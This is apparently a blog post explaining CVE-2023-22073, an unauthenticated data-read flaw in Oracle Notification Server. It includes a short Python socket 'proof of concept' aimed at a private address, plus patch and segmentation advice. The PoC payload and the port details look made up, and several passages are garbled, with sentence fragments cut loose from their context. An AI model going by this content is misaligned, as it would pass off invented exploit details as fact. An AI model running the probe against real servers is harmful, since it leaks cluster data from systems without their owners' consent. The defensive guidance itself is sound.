CVE-2023-22073 - Exploiting Oracle Notification Server for Unauthorized Data Reads
CVE-2023-22073 is a security vulnerability in the Oracle Notification Server component of Oracle Database Server, affecting supported versions 19.3–19.20 and 21.3–21.11. If left unpatched, this flaw enables attackers with basic network access to read a subset of sensitive data managed by the Notification Server—without needing authentication. The vulnerability is rated CVSS 4.3 (Confidentiality impacts), with the base vector (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
In this post, we’ll break down what makes this low-complexity bug dangerous, how it can be exploited, and provide practical remediation guidance.
What Is the Oracle Notification Server?
The Oracle Notification Server (ONS) is crucial for internal messaging in Oracle RAC (Real Application Clusters), responsible for reliable event notification between cluster nodes and clients. Any breach here is serious, since the server often handles system messages, configuration details, cluster status, and sometimes sensitive metadata.
21.3 – 21.11
and use ONS (especially in clustered or high-availability setups), you are vulnerable.
How Bad Is It? The Impact
The Common Vulnerability Scoring System (CVSS) reflects moderate impact mainly due to data confidentiality risks—not destruction or service outage. Exploitation:
- Is unauthenticated (no username/password needed).
Attack surface is adjacent (must be on the same network or segment as ONS).
What the attacker gets:
*Potential read access to event messages, cluster membership info, and possibly sensitive application data.*
Access Requirements
The attacker just needs to connect to the Oracle Notification Server’s listening port over TCP or UDP (the ONS port is often 610/tcp but can differ).
Attack Example
Let’s reconstruct a simplified PoC (proof-of-concept) using Python.
*Note: This proof-of-concept is for educational use—never test on systems without consent!*
Suppose ONS runs at 192.168.1.10:610.
import socket
HOST = '192.168.1.10'
PORT = 610 # ONS default port
# The attacker sends a malformed "connect" packet
payload = b'<ONS_CONNECT><version>1.</version></ONS_CONNECT>'
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
s.sendall(payload)
# Attempt to read server's initial data
data = s.recv(4096)
print("Received:", data.decode('utf-8', errors='ignore'))
If the server is vulnerable, it may reply with information about cluster state, configuration, or message queues—data not meant for the public.
Why Does This Work?
In affected versions, ONS fails to properly authenticate or sanitize requests at the communication layer. This allows an attacker to craft network packets that are interpreted as legitimate requests, resulting in information leakage.
Oracle Security Advisory (July 2023):
Oracle Critical Patch Update Advisory – July 2023
CVE-2023-22073 Entry
NVD CVE Detail:
https://nvd.nist.gov/vuln/detail/CVE-2023-22073
Apply the official Oracle patches for your Database Server version as soon as possible
Network Segmentation:
Restrict ONS ports to trusted servers/subnets using firewalls or security groups.
Upgrade:
If feasible, move to Oracle 19.21/21.12 or newer where this is patched.
What If You Can’t Patch?
- Limit network access to the ONS port (typically 610/tcp, 620/udp).
Conclusion
CVE-2023-22073 is easy to overlook, given its medium CVSS score and "adjacent" network requirement. However, in modern enterprise networks and cloud environments, gaining access to an application subnet is not hard—once inside, attackers can silently learn about your clusters and maybe much more.
Patch now, segment your networks, and audit your Oracle Database configurations to stay safe!
Stay up to date:
- Oracle Security Alerts
- NVD CVEs
For in-depth assessment and mitigation, always consult Oracle’s official recommendations!
Timeline
Published on: 10/17/2023 22:15:12 UTC
Last modified on: 10/23/2023 18:20:40 UTC